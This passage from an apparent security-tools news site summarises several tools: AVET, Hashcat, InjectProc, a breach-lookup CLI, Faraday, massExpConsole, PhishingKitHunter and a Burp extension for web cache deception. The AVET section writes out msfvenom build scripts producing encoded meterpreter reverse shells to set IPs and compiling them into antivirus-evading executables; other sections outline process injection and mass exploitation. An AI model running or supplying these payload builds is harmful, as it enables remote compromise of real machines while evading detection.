#echo "" > defs.h
# now you can call your programm with pwn.exe, thepayload.txt has to be in the same dir

Example 5, load with Internet Explorer
This is a bit tricky and might not work on the first shot. The executable will start Internet Explorer and download the ASCII encoded shellcode. Then the shellcode will be read from the cache directory and if found executed. This was tested with Windows 7 only.

#!/bin/bash          
# simple example script for building the .exe file
. build/global_win32.sh
# make meterpreter reverse payload, encoded with shikata_ga_nai
# additionaly to the avet encoder, further encoding should be used
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.2.105 lport=443 -e x86/shikata_ga_nai -i 2 -f c -a x86 --platform Windows > sc.txt
# format the shellcode for make_avet
./format.sh sc.txt > scclean.txt && rm sc.txt
# call make_avet, compile 
./make_avet -E -u 192.168.2.105/scclean.txt
$win32_compiler -o pwn.exe avet.c
# cleanup
echo " " > defs.h
# now copy scclean.txt to your web root and start 

avet_fabric.py
avet_fabric is an assistant, that loads all build scripts in the build directory (name has to be build*.sh) and then lets the user edit the settings line by line. This is under huge development.
Example:

# ./avet_fabric.py 

                       .|        ,       +
             *         | |      ((             *
                       |'|       `    ._____
         +     ___    |  |   *        |.   |' .---"|
       _    .-'   '-. |  |     .--'|  ||   | _|    |
    .-'|  _.|  |    ||   '-__  |   |  |    ||      |
    |' | |.    |    ||       | |   |  |    ||      |
 ___|  '-'     '    ""       '-'   '-.'    '`      |____
jgs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AVET 1.1 Blackhat Asia 2017 edition
by Daniel Sauder

avet_fabric.py is an assistant for building exe files with shellcode payloads for targeted attacks and antivirus evasion.

0: build_win32_meterpreter_rev_https_shikata_loadfile.sh
1: build_win32_meterpreter_rev_https_shikata_fopen.sh
2: build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
3: build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
4: build_win32_meterpreter_rev_https_20xshikata.sh
5: build_win32_meterpreter_rev_https_shikata_load_ie.sh
6: build_win64_meterpreter_rev_tcp.sh
Input number of the script you want use and hit enter: 6

Now you can edit the build script line by line.

simple example script for building the .exe file
$ . build/global_win64.sh
make meterpreter reverse payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
format the shellcode for make_avet
$ ./format.sh sc.txt > scclean.txt && rm sc.txt
call make_avet, compile
$ ./make_avet -f scclean.txt -X -E
$ $win64_compiler -o pwn.exe avet.c
cleanup
$ rm scclean.txt && echo "" > defs.h

The following commands will be executed:
#/bin/bash
. build/global_win64.sh
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.116.132 lport=443 -f c --platform Windows > sc.txt
./format.sh sc.txt > scclean.txt && rm sc.txt
./make_avet -f scclean.txt -X -E
$win64_compiler -o pwn.exe avet.c
rm scclean.txt && echo "" > defs.h

Press enter to continue.

Building the output file...

Please stand by...

The output file should be placed in the current directory.

Bye...

Download AVET

Read More

Hashcat v3.6.0 - World's Fastest and Most Advanced Password Recovery Utility

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation

Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

GPU Driver requirements:

• AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
• AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
• Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
• Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
• Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
• NVIDIA GPUs require "NVIDIA Driver" (367.x or later)

Features

• World's fastest password cracker
• World's first and only in-kernel rule engine
• Free
• Open-Source (MIT License)
• Multi-OS (Linux, Windows and OSX)
• Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
• Multi-Hash (Cracking multiple hashes at the same time)
• Multi-Devices (Utilizing multiple devices in same system)
• Multi-Device-Types (Utilizing mixed device types in same system)
• Supports distributed cracking networks (using overlay)
• Supports interactive pause / resume
• Supports sessions
• Supports restore
• Supports reading password candidates from file and stdin
• Supports hex-salt and hex-charset
• Supports automatic performance tuning
• Supports automatic keyspace ordering markov-chains
• Built-in benchmarking system
• Integrated thermal watchdog
• 200+ Hash-types implemented with performance in mind
• ... and much more

Algorithms

• MD4
• MD5
• Half MD5 (left, mid, right)
• SHA1
• SHA-224
• SHA-256
• SHA-384
• SHA-512
• SHA-3 (Keccak)
• BLAKE2b-512
• SipHash
• Skip32
• RIPEMD-160
• Whirlpool
• DES (PT = $salt, key = $pass)
• 3DES (PT = $salt, key = $pass)
• ChaCha20
• GOST R 34.11-94
• GOST R 34.11-2012 (Streebog) 256-bit
• GOST R 34.11-2012 (Streebog) 512-bit
• md5($pass.$salt)
• md5($salt.$pass)
• md5(unicode($pass).$salt)
• md5($salt.unicode($pass))
• md5($salt.$pass.$salt)
• md5($salt.md5($pass))
• md5($salt.md5($salt.$pass))
• md5($salt.md5($pass.$salt))
• md5(md5($pass))
• md5(md5($pass).md5($salt))
• md5(strtoupper(md5($pass)))
• md5(sha1($pass))
• sha1($pass.$salt)
• sha1($salt.$pass)
• sha1(unicode($pass).$salt)
• sha1($salt.unicode($pass))
• sha1(sha1($pass))
• sha1($salt.sha1($pass))
• sha1(md5($pass))
• sha1($salt.$pass.$salt)
• sha1(CX)
• sha256($pass.$salt)
• sha256($salt.$pass)
• sha256(unicode($pass).$salt)
• sha256($salt.unicode($pass))
• sha512($pass.$salt)
• sha512($salt.$pass)
• sha512(unicode($pass).$salt)
• sha512($salt.unicode($pass))
• HMAC-MD5 (key = $pass)
• HMAC-MD5 (key = $salt)
• HMAC-SHA1 (key = $pass)
• HMAC-SHA1 (key = $salt)
• HMAC-SHA256 (key = $pass)
• HMAC-SHA256 (key = $salt)
• HMAC-SHA512 (key = $pass)
• HMAC-SHA512 (key = $salt)
• PBKDF2-HMAC-MD5
• PBKDF2-HMAC-SHA1
• PBKDF2-HMAC-SHA256
• PBKDF2-HMAC-SHA512
• MyBB
• phpBB3
• SMF (Simple Machines Forum)
• vBulletin
• IPB (Invision Power Board)
• WBB (Woltlab Burning Board)
• osCommerce
• xt:Commerce
• PrestaShop
• MediaWiki B type
• WordPress
• Drupal 7
• Joomla
• PHPS
• Django (SHA-1)
• Django (PBKDF2-SHA256)
• Episerver
• ColdFusion 10+
• Apache MD5-APR
• MySQL
• PostgreSQL
• MSSQL
• Oracle H: Type (Oracle 7+)
• Oracle S: Type (Oracle 11+)
• Oracle T: Type (Oracle 12+)
• Sybase
• hMailServer
• DNSSEC (NSEC3)
• IKE-PSK
• IPMI2 RAKP
• iSCSI CHAP
• CRAM-MD5
• MySQL CRAM (SHA1)
• PostgreSQL CRAM (MD5)
• SIP digest authentication (MD5)
• WPA
• WPA2
• NetNTLMv1
• NetNTLMv1+ESS
• NetNTLMv2
• Kerberos 5 AS-REQ Pre-Auth etype 23
• Kerberos 5 TGS-REP etype 23
• Netscape LDAP SHA/SSHA
• FileZilla Server
• LM
• NTLM
• Domain Cached Credentials (DCC), MS Cache
• Domain Cached Credentials 2 (DCC2), MS Cache 2
• DPAPI masterkey file v1 and v2
• MS-AzureSync PBKDF2-HMAC-SHA256
• descrypt
• bsdicrypt
• md5crypt
• sha256crypt
• sha512crypt
• bcrypt
• scrypt
• OSX v10.4
• OSX v10.5
• OSX v10.6
• OSX v10.7
• OSX v10.8
• OSX v10.9
• OSX v10.10
• iTunes backup < 10.0
• iTunes backup >= 10.0
• AIX {smd5}
• AIX {ssha1}
• AIX {ssha256}
• AIX {ssha512}
• Cisco-ASA MD5
• Cisco-PIX MD5
• Cisco-IOS $1$ (MD5)
• Cisco-IOS type 4 (SHA256)
• Cisco $8$ (PBKDF2-SHA256)
• Cisco $9$ (scrypt)
• Juniper IVE
• Juniper NetScreen/SSG (ScreenOS)
• Juniper/NetBSD sha1crypt
• Fortigate (FortiOS)
• Samsung Android Password/PIN
• Windows Phone 8+ PIN/password
• GRUB 2
• CRC32
• RACF
• Radmin2
• Redmine
• PunBB
• OpenCart
• Atlassian (PBKDF2-HMAC-SHA1)
• Citrix NetScaler
• SAP CODVN B (BCODE)
• SAP CODVN F/G (PASSCODE)
• SAP CODVN H (PWDSALTEDHASH) iSSHA-1
• PeopleSoft
• PeopleSoft PS_TOKEN
• Skype
• WinZip
• 7-Zip
• RAR3-hp
• RAR5
• AxCrypt
• AxCrypt in-memory SHA1
• PDF 1.1 - 1.3 (Acrobat 2 - 4)
• PDF 1.4 - 1.6 (Acrobat 5 - 8)
• PDF 1.7 Level 3 (Acrobat 9)
• PDF 1.7 Level 8 (Acrobat 10 - 11)
• MS Office <= 2003 MD5
• MS Office <= 2003 SHA1
• MS Office 2007
• MS Office 2010
• MS Office 2013
• Lotus Notes/Domino 5
• Lotus Notes/Domino 6
• Lotus Notes/Domino 8
• Bitcoin/Litecoin wallet.dat
• Blockchain, My Wallet
• Blockchain, My Wallet, V2
• 1Password, agilekeychain
• 1Password, cloudkeychain
• LastPass
• Password Safe v2
• Password Safe v3
• KeePass 1 (AES/Twofish) and KeePass 2 (AES)
• JKS Java Key Store Private Keys (SHA1)
• Ethereum Wallet, PBKDF2-HMAC-SHA256
• Ethereum Wallet, SCRYPT
• eCryptfs
• Android FDE <= 4.3
• Android FDE (Samsung DEK)
• TrueCrypt
• VeraCrypt
• LUKS
• Plaintext

Attack-Modes

• Straight ^*
• Combination
• Brute-force
• Hybrid dict + mask
• Hybrid mask + dict

^* accept Rules

Supported OpenCL runtimes

• AMD
• Apple
• Intel
• Mesa (Gallium)
• NVidia
• pocl

Supported OpenCL device types

• GPU
• CPU
• APU
• DSP
• FPGA
• Coprocessor

Download Hashcat

Read More

InjectProc - Process Injection Techniques

Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.

There are several techniques, which are commonly used: DLL injection, process replacement (a.k.a process hollowing), hook injection and APC injection.

Most of them use same Windows API functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, for detailed information about those functions, use MSDN.

DLL injection:

• Open target process.
• Allocate space.
• Write code into the remote process.
• Execute the remote code.

Process replacement:

• Create target process and suspend it.
• Unmap from memory.
• Allocate space.
• Write headers and sections into the remote process.
• Resume remote thread.

Hook injection:

• Find/Create process.
• Set hook

APC injection:

• Open process.
• Allocate space.
• Write code into remote threads.
• "Execute" threads using QueueUserAPC.

Download
Windows x64 binary - x64 bit DEMO

Dependencies:
vc_redist.x64 - Microsoft Visual C++ Redistributable

DEMO

Download InjectProc

Read More

pwned - A command-line tool for querying the 'Have I been pwned?' service

A command-line tool for querying Troy Hunt's Have I been pwned? service using the hibp Node.js module.

Installation

npm install pwned -g

Usage

Usage: pwned [option | command]


Commands:

  ba [options] <account>   get all breaches for an account (username or email address)
  breaches [options]       get all breaches in the system
  breach [options] <name>  get a single breached site by breach name
  dc [options]             get all data classes in the system
  pa [options] <email>     get all pastes for an account (email address)

Each command has its own -h (--help) option.

Options:

  -h, --help     output usage information
  -v, --version  output the version number

Examples
Get all breaches for an account:

$ pwned ba pleasebeclean@fingerscrossed.tld
Good news — no pwnage found!

Get all breaches in the system, filtering results to just the 'adobe.com' domain:

$ pwned breaches -d adobe.com
-
  Title:       Adobe
  Name:        Adobe
  Domain:      adobe.com
  BreachDate:  2013-10-04
  AddedDate:   2013-12-04T00:00:00Z
  PwnCount:    152445165
  Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
  DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
  IsVerified:  true
  IsSensitive: false
  IsActive:    true
  IsRetired:   false
  LogoType:    svg

Get a single breached site by breach name:

$ pwned breach MyCompany
No breach found by that name.

Get all the data classes in the system, returning raw JSON results for external/chained consumption:

$ pwned dc --raw
["Account balances","Age groups","Astrological signs","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Car ownership statuses","Career levels","Chat logs","Credit cards","Customer feedback","Customer interactions","Dates of birth","Device information","Device usage tracking data","Drinking habits","Drug habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Historical passwords","Home ownership statuses","Homepage URLs","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nicknames","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Personal descriptions","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political views","Private messages","Purchases","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Spoken languages","Time zones","Travel habits","User agent details","User statuses","User website URLs","Usernames","Website activity","Work habits","Years of birth"]

Get all pastes for an email address:

$ pwned pa nobody@nowhere.com
-
  Source:     Pastebin
  Id:         xyb8vavK
  Title:      null
  Date:       2015-06-01T00:16:46Z
  EmailCount: 8
-
  Source:     Pastebin
  Id:         DaaFj8Be
  Title:      CrackingCore - Redder04
  Date:       2015-04-05T22:22:39Z
  EmailCount: 116
-
  Source:     Pastebin
  Id:         9MAAgecd
  Title:      IPTV YabancÄą Combolist
  Date:       2015-02-07T15:21:00Z
  EmailCount: 244
-
  Source:     Pastebin
  Id:         QMx1dPUT
  Title:      null
  Date:       2015-02-02T20:45:00Z
  EmailCount: 6607
-
  Source:     Pastebin
  Id:         zUFSee4n
  Title:      nethingoez
  Date:       2015-01-21T15:13:00Z
  EmailCount: 312
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4560
  Title:      BuzzMachines.com 40k+
  Date:       null
  EmailCount: 36959
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4737
  Title:      PayPalSucks Database 102k
  Date:       null
  EmailCount: 82071

Download pwned

Read More

Faraday v2.5 - Collaborative Penetration Test and Vulnerability Management Platform

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

Data Analysis tools

Since Faraday allows you to keep all of your pentests in one place, we thought it would be interesting to add the possibility to see your assessments come to life, so we added new data analysis reports to the Web UI: 

• Tools findings by severity and targets 
• Vulnerability severity cluster
•  Severity timeline
•  Service vulnerability timeline
•  Target severity pie charts
•  OS severity pie charts
•  Severity by tool boxplot
•  Total vulnerability correlation with price by each OS
•  Vulnerability by type chart, ease of resolution and OS
•  Vulnerability by year tree

These charts allow you to find new relations between your data and clarify the state of an assessment.

We will also add new charts in the future, and the possibility to customize them as well!

As an example, this is how some of the current reports look

Target severity

Vuln severity price vs creator

Target severity cluster map

Tools findings by severity and targets alluvial chart

You can also download the charts as PNG or SVG format to include them in your custom reports.

Download charts as PNG

Credentials CRUD

One of the big goals in every internal pentest is gathering service credentials to log in to a host, escalate privileges and pivot. Wouldn’t it be great if you could store all your credentials in one place? Now you can! Save all the found creds in Faraday’s DB, query it using the Faraday Plugin and feed other tools to keep hacking!

Vuln templates CRUD

Manually creating vulnerabilities has always been a nuisance, from getting evidence to wording the descriptions - no one likes it. And also, explanations vary between testers, so what sounds perfectly understandable to one person can be gibberish to another.

Knowing this is a continuous issue when reporting, we added the Vulnerability Templates Database in version 1.0.12. We knew back then that editing a CSV and uploading it every time a change was needed wasn’t the best approach, but other features came first when prioritizing.

An improvement on this feature was long overdue so we created a brand new view in the Web UI just to manage these templates. You can now upload a CSV file from the Web UI and then edit the templates as desired.

Vuln templates view

But wait! The plot thickens! You can also create a template from an existing vulnerability!

Write your vulns once, and use them forever.

Hosts revamp

When users wanted to edit or create hosts in previous Faraday versions, the only options was through a modal dialog. This was especially annoying in small screens, when scrolling and cluttered information became a hassle.

Deprecated modal view

Keeping in mind that managing hosts is a very important task to pentesters and managers alike we decided to update the hosts manager. As of this version you can examine, create and edit hosts from the same full view. Since it is no longer a modal dialog, the whole browser window is used, allowing to have all of the host details, along with its services in plain sight. No more scrolling, no more three clicks to get the host info!

Improved host view

Host creation view

Host edition view

Plugins Core Improvements

Faraday’s Plugin System is a core piece of the platform and that is why we constantly work on adding new tools and improving the ones we already support. In this iteration we improved the system itself so that plugins can access the error console and communicate with the user in a simplified manner.

Plugin output

On the maintenance side, we fixed a bug in the Nessus plugin which locked the vuln edition after processing and added support for SQLmap‘s -r argument that allows adding an HTTP request file instead of manually loading the URL and headers. We also modified a few other plugins (Core Impact, Netsparker, Nikto, Propecia, Qualysguard, SQLmap, Telnet and Wapiti) to improve the content of the vulnerabilities that are added to the platform, creating better Executive Reports.

Misc

It’s not uncommon for our users to switch between versions (for example, when upgrading from Community to Pro) and some issues arose in that process. Keeping that use case in mind, we improved how the Faraday Client verifies its version against the Server to avoid further issues in the future.

Also, we did some improvements in GTK’s link to the Web UI and corrected a bug that prevented the Web UI from saving changes to workspaces created using the GTK Client.

Some of our Pro and Corp users had troubles starting the Server with no internet connection. We changed its behavior when bootstrapping without an active internet access, allowing users to run it even with limited connectivity.

Regarding the Executive Report, we fixed a minor bug that generated inconsistent reports when grouping regular vulns with web vulns.

Target, website, param name and path are grouped correctly

With the new additions to the Web UI, the left navigation bar was overloaded so we removed the administrative links (Workspaces, Users and Licenses) and added them to a new admin menu on the top right, along with a link to the Help page and an about dialog.

About Faraday

A special config for our Corp Customers

Because of a refactor in the auth system made in the last Corporate Version Release we need to ask the users to setup CouchDB correctly to avoid constantly losing the session.
To avoid headaches, follow this step-by-step guide:

1. Turn off Faraday Server (./faraday-server.pyc –stop)

1. Turn off CouchDB (systemctl stop couchdb)

1. Modify the file “local.ini” usually located in the path /etc/couch/local.ini

1. Add the following lines to the [couch_httpd_auth] part of that file

   allow_persistent_cookies = true
   timeout = 9999999

1. Initialize CouchDB and Faraday Server again and you are all set

Changes and fixes

Corp changes

• Added a Data Analysis component to the Web UI

Pro & Corp changes

• Fixed a bug in the GTK interface when trying to configure an non-existent URL 
• Always redirect to login page when user is not logged in 
• Prevent users with role client to login using GTK 
• Disable host and vuln edit buttons when logged in as client 
• Fixed the server, which was refusing some valid licenses 
• Improved grouping in Executive Reports 
• Redirect to home page when a logged user visits login page

Community, Pro & Corp changes

• Fixed bug when editing workspaces created in GTK 
• Improved host search in the WEB UI 
• Extended the config to support different searching engines in the WEB UI 
• Check that client and server versions match when connecting 
• Adds the 'v’ and 'version’ argument for both the server and the client 
• Fixed “refresh” button in the Web UI 
• Fix API on /ws/<workspace> with duration object None 
• Added a CRUD for Credentials to the Web UI 
• Bug fixes on the Burp Online Plugin 
• Added a script to connect with Reposify 
• Fixed Hostname import in Nessus Plugin 
• Make plugin methods log() and devlog() work again 
• Fixed bug in SQLMap plugin that made the client freeze 
• Improved SQLMap plugin to support more options and to show errors in GTK log console 
• Fixed bug when creating/updating Credentials 
• Improve plugins usage of vulnweb URL fields 
• Fixed order of Report Plugins in the GTK import list

https://www.faradaysec.com/
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/
https://www.faradaysec.com/ideas

Read More

massExpConsole - Collection of Tools and Exploits with a CLI UI

Collection of Tools and Exploits with a CLI UI

What does it do?

• an easy-to-use user interface (cli)
• execute any adapted exploit with process-level concurrency
• crawler for baidu and zoomeye
• a simple webshell manager
• some built-in exploits (automated)
• more to come...

Requirements

• GNU/Linux or MacOS, WSL (Windows Subsystem Linux), fully tested under Kali Linux (Rolling, 2017), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
• proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
• Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven't installed it yet
• python packages (not complete, as some third-party scripts might need other deps as well):
  • requests
  • bs4
  • beautifulsoup4
  • html5lib
  • docopt
  • pip3 install on the go
• note that you have to install all the deps of your exploits or tools as well

Usage

• just run mec.py, if it complains about missing modules, install them
• if you want to add your own exploit script (or binary file, whatever):
  • cd exploits, mkdir <yourExploitDir>
  • your exploit should take the last argument passed to it as its target, dig into mec.py to know more
  • chmod 755 <exploitBin> to make sure it can be executed by current user
  • use attack command then m to select your custom exploit
• type help in the console to see all available features

Download massExpConsole

Read More

PhishingKitHunter - Find Phishing Kits Which Use Your Brand/Organization'S Files And Image

Find phishing kits which use your brand/organization's files and image.

PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, ...). This tool - write in Python 3 - is based on the analysis of referer's URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed. PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter's config file.

Features

• find URL where a phishing kit is deployed
• find if the phishing kit is still up and running
• generate a JSON report usefull for external usage
• use a hash of the phishing kit's page to identify the kit
• use a timestamp for history
• can use HTTP or SOCKS5 proxy

Usage

$ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|   

-= Phishing Kit Hunter - v0.6b =-

[+] http://badscam.org/includes/ap/?a=2
  |   Timestamp: 01/May/2017:13:00:03
  | HTTP status: can't connect (HTTP Error 404: Not Found)
[+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
  |   Timestamp: 01/May/2017:13:00:49
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://badscam-er.com/eb/?e=4
  |   Timestamp: 01/May/2017:13:01:06
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
  |   Timestamp: 01/May/2017:13:01:14
  | HTTP status: UP
  | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
[+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
  |   Timestamp: 01/May/2017:13:01:15
  | HTTP status: UP
  | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
697475it [06:41, 1208.14it/s]

Help

$ ./PhishingKitHunter-0.6.py --help

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|    

-= Phishing Kit Hunter - v0.6b =-

   -h --help   Prints this
   -i --ifile    Input logfile to analyse
   -o --ofile    Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
   -c --config   Configuration file to use (default: ./conf/defaults.conf)

JSON report example

$ cat ./PKHunter-report-20170502-013307.json

{
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
        "Domain": "badscam.org",
        "HTTP_sha256": "",
        "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
        "date": "01/May/2017:13:00:03"
    }
}{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
        "Domain": "assur.cam.tech",
        "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
        "HTTP_status": "UP",
        "date": "01/May/2017:13:01:14"
    }
}
[...]

Requirements

• Python 3
• requests
• tqdm
• json
• PySocks

Install
Install the requirements

pip install -r requirements.txt

Configure
Please read the conf/default.conf file to learn how to configure PhishingKitHunter.

Download PhishingKitHunter

Read More

Airachnid Burp Extension - A Burp Extension to test applications for vulnerability to the Web Cache Deception attack

A Burp extension to test applications for vulnerability to the Web Cache Deception attack.

Once the extension has been loaded, it can be accessed in the Target - Sitemap tab and right click on the resource that should be tested. A context sensitive menu item called "Airachnid Web Cache Test" will be shown and can be used to conduct testing. If the resource is vulnerable, an Issue is created detailing the vulnerability.

The context sensitive menu item is also available for requests in the Proxy - Http History tab.

Installation

• Download the Airachnid.jar file.
• In Burp Suite open Extender tab. In Extensions tab, click Add button.
• Choose downloaded jar file -> Next.
• Check installation for no error messages.

Vulnerability

In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).

The Web Cache Deception attack could be devastating in consequences, but is very simple to execute:

1. Attacker coerces victim to open a link on the valid application server containing the payload.
2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.

** Of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.
The attack depends on a very specific set of circumstances to make the application vulnerable: 1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:

https://www.example.com/my_profile

The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for

https://www.example.com/my_profile_test

It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like

https://www.example.com/my_profile/test

2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files. It will cache all resources with .jpg .png or .gif extensions. That means that e.g. the image at

https://www.example.com/images/dog.jpg

Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).

Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
  https://www.example.com/my_profile/test.jpg

• The application ignores the 'test.jpg' part of the URL, the victim profile page is loaded.
• The caching mechanism identifies the resource as an image, caching it.  

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg

• The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).

Download Airachnid Burp Extension

Read More